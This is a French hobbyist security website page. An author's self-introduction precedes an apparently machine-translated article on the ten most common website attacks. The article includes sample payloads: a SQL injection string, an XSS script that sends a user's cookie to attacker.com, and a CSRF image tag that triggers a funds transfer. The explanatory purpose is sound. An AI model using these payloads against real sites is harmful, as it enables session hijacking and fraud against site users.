Le Saint Graal du Web

HACK THE PLANET

Je me nomme Numerius,

Et je suis un passionné de Linux

Bonjour à tous,

Je vous présente mon Site Web

« lesaintgraalduweb ».

Je me présente,

Je me nomme Numerius

et je suis un passionné de Linux.

Sur cette page je vous présente mon Site Web sur la sécurité informatique.

Sur ce Site Web vous pourrez trouver tous ce qu’il vous faudra savoir sur la sécurité informatique et vous trouverez également tous ce qu’il vous faudra pour naviguer sur internet.

J’ai essayer de créer un Site Web qui pourrais être utiles à tous.

J’ai rassembler le maximum de choses utiles aux Hackers et à monsieurs tous le mondes qui débute dans la sécurité informatique.

Mais faite attention car vous devez savoir que le Hacking est interdit sans l’accord du propriétaire.

Sur ce Site Web vous trouverez tous ce qu’il vous faudra savoir sur la sécurité informatique.

Je vous est mis des tonnes de Tutos sur comment Tester la Sécurité de votre Wifi, de votre PC, de votre Site Web, de votre compte Facebook, de votre compte Gmail et de votre téléphone.

Je vous est offert des cadeaux téléchargeables et vous pourrez également télécharger des OS Linux de pentesting, des Wordlists, des Scripts pour Linux, des navigateurs Web et des machines virtuelles.

Vous trouverez également différents page qui servirons à faire vos recherches Web, comme les favoris des hackers, les moteurs de recherche du monde, les google du monde et tous les annuaires téléphonique de notre petite planète bleu.

Vous saurez également tout sur le Dark Web et vous aurez une invitation à me rejoindre sur le Web Obscure qui n’est autres que le Dark Web.

Ce Site Web est parfait pour ceux qu’il veulent apprendre à tester la sécurité informatique.

Mais sachez qu’il y a encore plein de choses, de pages et de liens que vous découvrirez en visitant mon Site Web.

Et si mon Site vous à plu sachez que vous avez la possibilité de me faire un Don du montant de votre choix sur la connexion de PayPal et que si vous voulez rester anonyme vous avez aussi la possibilité de me faire un Don en Cryptomonnaie.

Sans vous en dire plus je vous laisse découvrir mon Site Web, je vous souhaite plein de plaisirs et qu’il vous soie enrichissant.

Je vous souhaite à tous une bonne journée et à bientôt.

C’étais Numerius…

Top 10 Linux de Pentesting

Les Hackers les plus recherchés du Monde

10 Façons les plus populaires pour les Hackers de pirater votre Site Web

Façons dont les pirates informatiques piratent votre site

 

Quiz pop: qu’est-ce que Microsoft, Twitter, Facebook, NBC, ZenDesk et Drupal ont en commun?

Ils ont tous été récemment piratés.

Oui, le piratage est une menace croissante pour toutes les entreprises, grandes et petites.

Qu’il s’agisse de voler des données privées, de prendre le contrôle de votre ordinateur ou de fermer votre site Web, les pirates peuvent avoir un impact sérieux sur n’importe quelle entreprise, à tout moment. Nous avons mené une analyse en toute sécurité depuis son existence sur différents vecteurs d’attaque possibles et, par conséquent, il a été prouvé avec un record de sécurité des applications Web en Inde et est actuellement en train de se mondialiser. Il y a des détails sur lesquels Defencely avait travaillé pour se faire un nom sur le portefeuille CIO pour son immense succès avec la sécurité des technologies de l’information en tant que fournisseur de services. À un grand étonnement, Defencely a non seulement résisté à son client dans le passé, mais maintenant il a fourni des recherches révolutionnaires pour tous ses clients avec des livrables spéciaux, les services de Defencely ayant été optés. Mais il y a un côté quiDefencely a choisi d’opter pour l’amélioration du monde du Web, et c’est le HACKING ÉTHIQUE WHITE HATEqui fait son chemin dans le monde des affaires et fournit des services de sécurité approfondis pour une protection globale de la sécurité Web à ses précieux clients. En dehors de chacun des services fournis par Defencely, il a maintenu un standard sage sur la chasse aux bogues et donc une excellence éprouvée pour ses livrables de qualité que les experts de la sécurité de l’équipe rouge. L’équipe rouge a pris la responsabilité de représenter Defencely dans diverses gratitudes, que ce soit pour la diffusion des problèmes de sécurité de l’information, la participation à des conférences sur la sécurité de l’information pour fournir gratuitement des tests industriels de pénétration pour une approche initiale et cela seul avait abouti à une déduction sage de la façon dont la sécurité pourrait simplement être une illusion pour le monde des affaires et comment les entreprises pourraient être ruinées pendant la nuit.

Les pirates peuvent attaquer de nombreuses façons, mais voici les dix façons les plus courantes de menacer la sécurité de votre site et de votre entreprise:

10. ATTAQUES PAR INJECTION

Les attaques par injection se produisent lorsqu’il y a des failles dans votre base de données SQL, vos bibliothèques SQL ou même le système d’exploitation lui-même. Les employés ouvrent des fichiers apparemment crédibles avec des commandes cachées, ou «injections», sans le savoir.

Ce faisant, ils ont permis aux pirates d’obtenir un accès non autorisé à des données privées telles que les numéros de sécurité sociale, le numéro de carte de crédit ou d’autres données financières.

EXEMPLE D’ATTAQUE PAR INJECTION TECHNIQUE:

Une attaque par injection pourrait avoir cette ligne de commande:

Requête de chaîne = “SELECT * FROM comptes WHERE custID = ‘” + request.getParameter (“id”) + “‘”;

Le pirate modifie le paramètre ‘id’ dans son navigateur pour envoyer: ‘ou’ 1 ‘=’ 1. Cela modifie la signification de la requête pour renvoyer tous les enregistrements de la base de données des comptes au pirate, au lieu des seuls clients visés.

9. ATTAQUES DE SCRIPT INTERSITE

Le Cross Site Scripting, également connu sous le nom d’attaque XSS, se produit lorsqu’une application, une URL «get request» ou un paquet de fichiers est envoyé à la fenêtre du navigateur Web et contourne le processus de validation. Une fois qu’un script XSS est déclenché, sa propriété trompeuse fait croire aux utilisateurs que la page compromise d’un site Web spécifique est légitime.

Par exemple, si www.example.com/abcd.html contient un script XSS, l’utilisateur peut voir une fenêtre contextuelle demandant ses informations de carte de crédit et d’autres informations sensibles.

EXEMPLE DE SCRIPT TECHNIQUE INTERSITE:

Un exemple plus technique:

(Chaîne) page + = “<nom d’entrée = ‘creditcard’ type = ‘TEXT’ value = ‘” + request.getParameter (“CC”) + “’>”;

L’attaquant modifie le paramètre ‘CC’ de son navigateur pour:

‘> <script> document.location =’ http: //www.attacker.com/cgi-bin/cookie.cgi? foo = ‘+ document.cookie </script>’

Cela provoque l’envoi de l’ID de session de l’utilisateur sur le site Web de l’attaquant, permettant au pirate de pirater la session actuelle de l’utilisateur. Cela signifie que le pirate a accès aux informations d’identification de l’administrateur du site Web et peut en prendre le contrôle complet. En d’autres termes, piratez-le.

8. ATTAQUES D’AUTHENTIFICATION ET DE GESTION DE SESSION BRISÉES

Si le système d’authentification des utilisateurs de votre site Web est faible, les pirates peuvent en profiter pleinement.

Les systèmes d’authentification impliquent des mots de passe, la gestion des clés, des identifiants de session et des cookies qui peuvent permettre à un pirate d’accéder à votre compte depuis n’importe quel ordinateur (tant qu’ils sont valides).

Si un pirate exploite le système d’authentification et de gestion de session, il peut assumer l’identité de l’utilisateur.

Effrayant en effet.

Posez-vous ces questions pour savoir si votre site Web est vulnérable à une attaque d’authentification et de gestion de session rompue:

  • Les informations d’identification de l’utilisateur sont-elles faibles (par exemple stockées à l’aide du hachage ou du chiffrement)?
  • Les informations d’identification peuvent-elles être devinées ou remplacées par des fonctions de gestion de compte faibles (par exemple, création de compte, changement de mot de passe, récupération de mot de passe, ID de session faibles)?
  • Les ID de session sont-ils exposés dans l’URL (par exemple, réécriture d’URL)?
  • Les ID de session sont-ils vulnérables aux attaques de fixation de session?
  • Les ID de session expirent-ils et les utilisateurs peuvent-ils se déconnecter?

Si vous avez répondu «oui» à l’une de ces questions, votre site pourrait être vulnérable à un pirate.

7. CLICKJACKING ATTACKS

Le détournement de clics, également appelé attaque de réparation d’interface utilisateur, est lorsqu’un pirate utilise plusieurs couches opaques pour inciter un utilisateur à cliquer sur la couche supérieure sans qu’il le sache.

Ainsi, l’attaquant «détourne» les clics qui ne sont pas destinés à la page réelle, mais à une page où l’attaquant veut que vous soyez.

Par exemple, en utilisant une combinaison soigneusement conçue de feuilles de style, de cadres iFrame et de zones de texte, un utilisateur peut être amené à croire qu’il tape le mot de passe de son compte bancaire, mais qu’il tape en fait dans un cadre invisible contrôlé par l’attaquant.

EXEMPLE DE DÉTOURNEMENT DE CLICS:

Voici un exemple en direct, mais sûr, du fonctionnement du détournement de clics:

http://attacker.kotowicz.net/alphabet-hero/game.html

Et voici une vidéo qui montre comment nous avons aidé Twitter à se défendre contre une attaque Clickjacking:

6. EMPOISONNEMENT DU CACHE DNS

L’empoisonnement du cache DNS implique d’anciennes données de cache que vous pensez peut-être ne plus avoir sur votre ordinateur, mais qui sont en fait «toxiques».

Également connu sous le nom de DNS Spoofing, les pirates peuvent identifier les vulnérabilités dans un système de nom de domaine, ce qui leur permet de détourner le trafic de serveurs légitimes vers un faux site Web et / ou serveur.

Cette forme d’attaque peut se propager et se répliquer d’un serveur DNS à un autre DNS, «empoisonnant» tout ce qui se trouve sur son chemin.

En fait, en 2010, une attaque d’empoisonnement DNS a complètement compromis le Great Firewall of China (GFC) temporairement et censuré certains contenus aux États-Unis jusqu’à ce que le problème soit résolu.

5. ATTAQUES D’INGÉNIERIE SOCIALE

Une attaque d’ingénierie sociale n’est pas techniquement un «hack».

Cela se produit lorsque vous divulguez des informations privées de bonne foi, comme un numéro de carte de crédit, via des interactions en ligne courantes telles que le courrier électronique, le chat, les sites de médias sociaux ou pratiquement n’importe quel site Web.

Le problème, bien sûr, est que vous n’entrez pas dans ce que vous pensez entrer.

Un exemple classique d’une attaque d’ingénierie sociale est l’arnaque «Microsoft tech support».

C’est quand quelqu’un d’un centre d’appels prétend être un membre du support technique MS qui dit que votre ordinateur est lent et / ou infecté, et peut être facilement réparé – à un coût, bien sûr.

Voici un article de Wired.com sur la façon dont un expert en sécurité a joué avec ce que l’on appelle le support technique Microsoft.

4. SYMLINKING – UNE ATTAQUE D’INITIÉ

Un lien symbolique est essentiellement un fichier spécial qui «pointe vers» un lien dur sur un système de fichiers monté. Une attaque de lien symbolique se produit lorsqu’un pirate informatique positionne le lien symbolique de telle manière que l’utilisateur ou l’application qui accède au point de terminaison pense qu’il accède au bon fichier alors qu’il ne l’est vraiment pas.

Si le fichier de point de terminaison est une sortie, la conséquence de l’attaque de lien symbolique est qu’il pourrait être modifié à la place du fichier à l’emplacement prévu. Les modifications apportées au fichier de point de terminaison peuvent inclure l’ajout, l’écrasement, la corruption ou même la modification des autorisations.

Dans différentes variantes d’une attaque par lien symbolique, un pirate peut être en mesure de contrôler les modifications apportées à un fichier, de s’accorder un accès avancé, d’insérer de fausses informations, d’exposer des informations sensibles ou de corrompre ou de détruire des fichiers système ou d’application vitaux.

3. ATTAQUES DE CONTREFAÇON DE DEMANDE INTERSITE

Une attaque de contrefaçon entre sites se produit lorsqu’un utilisateur est connecté à une session (ou un compte) et qu’un pirate utilise cette opportunité pour lui envoyer une fausse demande HTTP pour collecter ses informations de cookie.

Dans la plupart des cas, le cookie reste valide tant que l’utilisateur ou l’attaquant reste connecté au compte. C’est pourquoi les sites Web vous demandent de vous déconnecter de votre compte lorsque vous avez terminé – cela expirera la session immédiatement.

Dans d’autres cas, une fois que la session de navigation de l’utilisateur est compromise, le pirate peut générer des demandes à l’application qui ne pourront pas faire la différence entre un utilisateur valide et un pirate.

EXEMPLES D’ATTAQUES INTERSITES

Voici un exemple:

http://example.com/app/transferFunds?amount=1500&destinationAccount=4673243243

<img src = ”<span style =” color: red; ”> http://example.com/app/transferFunds?amount=1500&destinationAccount=attackersAcct# </span>” width = ”0 ″ height =” 0 ″ / >

Dans ce cas, le pirate crée une demande qui transférera de l’argent du compte d’un utilisateur, puis intègre cette attaque dans une demande d’image ou une iframe stockée sur divers sites sous le contrôle de l’attaquant.

2. ATTAQUES D’EXÉCUTION DE CODE À DISTANCE

Une attaque d’exécution de code à distance est le résultat de faiblesses de sécurité côté serveur ou côté client.

Les composants vulnérables peuvent inclure des bibliothèques, des répertoires distants sur un serveur qui n’ont pas été surveillés, des infrastructures et d’autres modules logiciels qui s’exécutent sur la base d’un accès utilisateur authentifié. Les applications qui utilisent ces composants sont toujours attaquées par le biais de scripts, de logiciels malveillants et de petites lignes de commande qui extraient des informations.

Les composants vulnérables suivants ont été téléchargés 22 millions de fois en 2011:

Contournement d’authentification Apache CXF ( http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3451 )

En omettant de fournir un jeton d’identité, les attaquants pourraient invoquer n’importe quel service Web avec une autorisation complète.

1. ATTAQUE DDOS – ATTAQUE PAR DÉNI DE SERVICE DISTRIBUÉ

DDoS, ou déni de services distribué, est l’endroit où les services d’un serveur ou d’une machine sont rendus indisponibles pour ses utilisateurs.

Et lorsque le système est hors ligne, le pirate informatique compromet tout le site Web ou une fonction spécifique d’un site Web à son propre avantage.

C’est un peu comme se faire voler sa voiture quand on a vraiment besoin d’aller vite.

Le programme habituel d’une campagne DDoS est d’interrompre temporairement ou de supprimer complètement un système fonctionnant avec succès.

L’exemple le plus courant d’une attaque DDoS pourrait être l’envoi de tonnes de demandes d’URL vers un site Web ou une page Web en très peu de temps. Cela provoque un goulot d’étranglement côté serveur car le processeur vient de manquer de ressources.

Les attaques par déni de service sont considérées comme des violations de la politique d’utilisation appropriée d’Internet du Conseil d’architecture Internet et violent également les politiques d’utilisation acceptable de pratiquement tous les fournisseurs de services Internet.

[maxbutton id = “1 ″]

Écrit par  sur|